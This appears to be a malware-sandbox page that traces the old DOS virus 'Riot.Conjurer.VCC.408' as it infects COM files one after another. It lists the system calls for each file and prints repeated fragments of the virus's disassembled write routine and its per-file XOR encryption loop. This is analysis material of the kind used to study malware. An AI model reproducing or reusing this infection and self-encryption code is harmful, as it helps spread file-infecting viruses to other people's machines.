Sample viewer

vx.netlux.org/Virus.DOS.Riot.Conjurer.VCC.408

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:54:47.985388623Z 26 PC: 12a73 | Set disk transfer address
2018-12-17T22:54:47.987365773Z 37 PC: 12a81 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:54:47.988637946Z 37 PC: 12a85 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:54:47.989852681Z 78 PC: 12ad1 | Find first file
2018-12-17T22:54:47.996475029Z 61 PC: 12b6c | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:54:48.00404502Z 63 PC: 12b7b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:54:48.010129917Z 66 PC: 12b8a | Move file pointer
2018-12-17T22:54:48.022440184Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:54:48.024171351Z 64 PC: 12ba5 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:48.026846212Z 66 PC: 12bb1 | Move file pointer
2018-12-17T22:54:48.029740848Z 44 PC: 12bb5 | Get time 0x12bb5: mov byte ptr [bp + 0x298], dl
0x12bb9: call 0x12bcf
0x12bbc: mov ah, 0x40
0x12bbe: mov cx, 0x198
0x12bc1: lea dx, word ptr [bp + 0x106]
0x12bc5: int 0x21
0x12bc7: call 0x12bcf
0x12bca: mov ah, 0x3e
0x12bcc: int 0x21
0x12bce: ret
0x12bcf: lea si, word ptr [bp + 0x120]
0x12bd3: mov cx, 0x159
0x12bd6: xor byte ptr [si], 0
0x12bd9: inc si
0x12bda: dec cx
0x12bdb: jne 0x12bd6
0x12bdd: ret
0x12bde: add word ptr [bx], di
0x12be0: aas
0x12be1: aas
2018-12-17T22:54:48.033660812Z 64 PC: 12bc7 | Write file or device (Write 408 bytes on handle 5)
2018-12-17T22:54:48.050983228Z 62 PC: 12bce | Close file
2018-12-17T22:54:48.079925292Z 79 PC: 12ad1 | Find next file
2018-12-17T22:54:48.084282028Z 61 PC: 12b6c | Open file (Filename = 'PRINT.COM')
2018-12-17T22:54:48.092826842Z 63 PC: 12b7b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:54:48.100248203Z 66 PC: 12b8a | Move file pointer
2018-12-17T22:54:48.103369555Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:54:48.105260251Z 64 PC: 12ba5 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:48.108544039Z 66 PC: 12bb1 | Move file pointer
2018-12-17T22:54:48.111556716Z 44 PC: 12bb5 | Get time 0x12bb5: mov byte ptr [bp + 0x298], dl
0x12bb9: call 0x12bcf
0x12bbc: mov ah, 0x40
0x12bbe: mov cx, 0x198
0x12bc1: lea dx, word ptr [bp + 0x106]
0x12bc5: int 0x21
0x12bc7: call 0x12bcf
0x12bca: mov ah, 0x3e
0x12bcc: int 0x21
0x12bce: ret
0x12bcf: lea si, word ptr [bp + 0x120]
0x12bd3: mov cx, 0x159
0x12bd6: xor byte ptr [si], 0x41
0x12bd9: inc si
0x12bda: dec cx
0x12bdb: jne 0x12bd6
0x12bdd: ret
0x12bde: add word ptr [bx], di
0x12be0: aas
0x12be1: aas
2018-12-17T22:54:48.114681524Z 64 PC: 12bc7 | Write file or device (Write 408 bytes on handle 5)
2018-12-17T22:54:48.1180977Z 62 PC: 12bce | Close file
2018-12-17T22:54:48.12827715Z 79 PC: 12ad1 | Find next file
2018-12-17T22:54:48.142104301Z 61 PC: 12b6c | Open file (Filename = 'HELLO.COM')
2018-12-17T22:54:48.149618155Z 63 PC: 12b7b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:54:48.157490374Z 66 PC: 12b8a | Move file pointer
2018-12-17T22:54:48.16528632Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:54:48.167363998Z 64 PC: 12ba5 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:48.17004438Z 66 PC: 12bb1 | Move file pointer
2018-12-17T22:54:48.173109105Z 44 PC: 12bb5 | Get time 0x12bb5: mov byte ptr [bp + 0x298], dl
0x12bb9: call 0x12bcf
0x12bbc: mov ah, 0x40
0x12bbe: mov cx, 0x198
0x12bc1: lea dx, word ptr [bp + 0x106]
0x12bc5: int 0x21
0x12bc7: call 0x12bcf
0x12bca: mov ah, 0x3e
0x12bcc: int 0x21
0x12bce: ret
0x12bcf: lea si, word ptr [bp + 0x120]
0x12bd3: mov cx, 0x159
0x12bd6: xor byte ptr [si], 0x46
0x12bd9: inc si
0x12bda: dec cx
0x12bdb: jne 0x12bd6
0x12bdd: ret
0x12bde: add word ptr [bx], di
0x12be0: aas
0x12be1: aas
2018-12-17T22:54:48.176140227Z 64 PC: 12bc7 | Write file or device (Write 408 bytes on handle 5)
2018-12-17T22:54:48.179669837Z 62 PC: 12bce | Close file
2018-12-17T22:54:48.190528253Z 79 PC: 12ad1 | Find next file
2018-12-17T22:54:48.193701333Z 61 PC: 12b6c | Open file (Filename = 'PHANG.COM')
2018-12-17T22:54:48.204971503Z 63 PC: 12b7b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:54:48.213065239Z 66 PC: 12b8a | Move file pointer
2018-12-17T22:54:48.21516027Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:54:48.217169139Z 64 PC: 12ba5 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:48.220729577Z 66 PC: 12bb1 | Move file pointer
2018-12-17T22:54:48.223175398Z 44 PC: 12bb5 | Get time 0x12bb5: mov byte ptr [bp + 0x298], dl
0x12bb9: call 0x12bcf
0x12bbc: mov ah, 0x40
0x12bbe: mov cx, 0x198
0x12bc1: lea dx, word ptr [bp + 0x106]
0x12bc5: int 0x21
0x12bc7: call 0x12bcf
0x12bca: mov ah, 0x3e
0x12bcc: int 0x21
0x12bce: ret
0x12bcf: lea si, word ptr [bp + 0x120]
0x12bd3: mov cx, 0x159
0x12bd6: xor byte ptr [si], 0x4c
0x12bd9: inc si
0x12bda: dec cx
0x12bdb: jne 0x12bd6
0x12bdd: ret
0x12bde: add word ptr [bx], di
0x12be0: aas
0x12be1: aas
2018-12-17T22:54:48.226873655Z 64 PC: 12bc7 | Write file or device (Write 408 bytes on handle 5)
2018-12-17T22:54:48.23042229Z 62 PC: 12bce | Close file
2018-12-17T22:54:48.240321552Z 79 PC: 12ad1 | Find next file
2018-12-17T22:54:48.249733007Z 61 PC: 12b6c | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:54:48.259280908Z 63 PC: 12b7b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:54:48.26784082Z 66 PC: 12b8a | Move file pointer
2018-12-17T22:54:48.269987849Z 66 PC: 12b99 | Move file pointer
2018-12-17T22:54:48.272029319Z 64 PC: 12ba5 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:54:48.276463Z 66 PC: 12bb1 | Move file pointer
2018-12-17T22:54:48.279592597Z 44 PC: 12bb5 | Get time 0x12bb5: mov byte ptr [bp + 0x298], dl
0x12bb9: call 0x12bcf
0x12bbc: mov ah, 0x40
0x12bbe: mov cx, 0x198
0x12bc1: lea dx, word ptr [bp + 0x106]
0x12bc5: int 0x21
0x12bc7: call 0x12bcf
0x12bca: mov ah, 0x3e
0x12bcc: int 0x21
0x12bce: ret
0x12bcf: lea si, word ptr [bp + 0x120]
0x12bd3: mov cx, 0x159
0x12bd6: xor byte ptr [si], 0x51
0x12bd9: inc si
0x12bda: dec cx
0x12bdb: jne 0x12bd6
0x12bdd: ret
0x12bde: add word ptr [bx], di
0x12be0: aas
0x12be1: aas
2018-12-17T22:54:48.282669656Z 64 PC: 12bc7 | Write file or device (Write 408 bytes on handle 5)
2018-12-17T22:54:48.287509881Z 62 PC: 12bce | Close file
2018-12-17T22:54:48.296379556Z 26 PC: 12aeb | Set disk transfer address